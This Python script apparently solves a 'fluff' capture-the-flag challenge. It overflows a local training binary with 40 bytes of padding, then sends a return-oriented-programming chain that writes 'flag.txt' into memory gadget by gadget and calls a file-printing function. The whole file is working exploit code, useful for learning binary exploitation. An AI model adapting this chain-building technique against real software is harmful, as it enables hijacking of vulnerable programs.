path: root/x86_64/fluff/exploit.py
blob: 2b520d84cf482d3922218224c46b518bfd8de194 (plain)
#!/usr/bin/env python3
import struct

from pwn import *

letter_lookups = {
        'f' : 0x00000000004003c4,
        'l' : 0x0000000000400239,
        'a' : 0x00000000004003d6,
        'g' : 0x00000000004003cf,
        '.' : 0x0000000000400251,
        't' : 0x0000000000400192,
        'x' : 0x0000000000400246}

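def write_str(dest, string, payload, lookups=None):
    """Append to *payload* the word sequence that writes *string* at *dest*.

    Each appended word is a 64-bit little-endian value (the same encoding
    pwntools ``p64`` produces under the default context).  The first
    character gets a longer preamble (``0x40062a`` preceded by ``0x4000``)
    while every later character goes through ``0x40062b``; that sequencing
    is the original author's and is kept unchanged here.

    Args:
        dest: address pushed immediately after the leading ``0x4006a3`` word;
            per the function's name this is where the string ends up.
        string: non-empty text to write; every character must be a key of
            the lookup table.
        payload: bytes built so far.  A ``bytes`` argument is left untouched
            and the extended copy returned; a ``bytearray`` is extended in
            place, as with the original ``+=`` form.
        lookups: optional per-character table; defaults to the module-level
            ``letter_lookups``.

    Returns:
        ``payload`` followed by the packed words.

    Raises:
        ValueError: if *string* is empty or contains a character missing
            from the table.  The original raised a bare ``IndexError`` /
            ``KeyError`` part-way through the build instead.
    """
    table = letter_lookups if lookups is None else lookups
    if not string:
        raise ValueError("write_str: string must be non-empty")
    missing = sorted({c for c in string if c not in table})
    if missing:
        raise ValueError(f"write_str: no lookup entry for {missing!r}")

    first, rest = string[0], string[1:]
    words = [
        0x4006A3,
        dest,
        0x400610,
        1,
        0x40062A,
        0x4000,
        table[first] - 0x3EF2,
        0x400628,
        0x400639,
    ]
    for c in rest:
        words += [
            0x40062B,
            table[c] - 0x3EF2,
            0x400610,
            1,
            0x400628,
            0x400639,
        ]

    # "<Q" is explicit little-endian u64, so the result does not depend on
    # pwntools' global context settings.
    payload += b"".join(struct.pack("<Q", w) for w in words)
    return payload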
        

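prog = process('./fluff')

# 40 bytes of padding ahead of the chain (the original appended one 'a'
# per loop iteration; the multiplication is the same bytes in one step).
payload = b'a' * 40

# 0x600df0 + 0xdf0 == 0x601be0; the same address is pushed again after
# the write, so it is named once rather than spelled two different ways.
DEST = 0x0000000000600df0 + 0x00000df0

payload = write_str(DEST, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(DEST)
payload += p64(0x0000000000400510)

prog.sendline(payload)
prog.interactive()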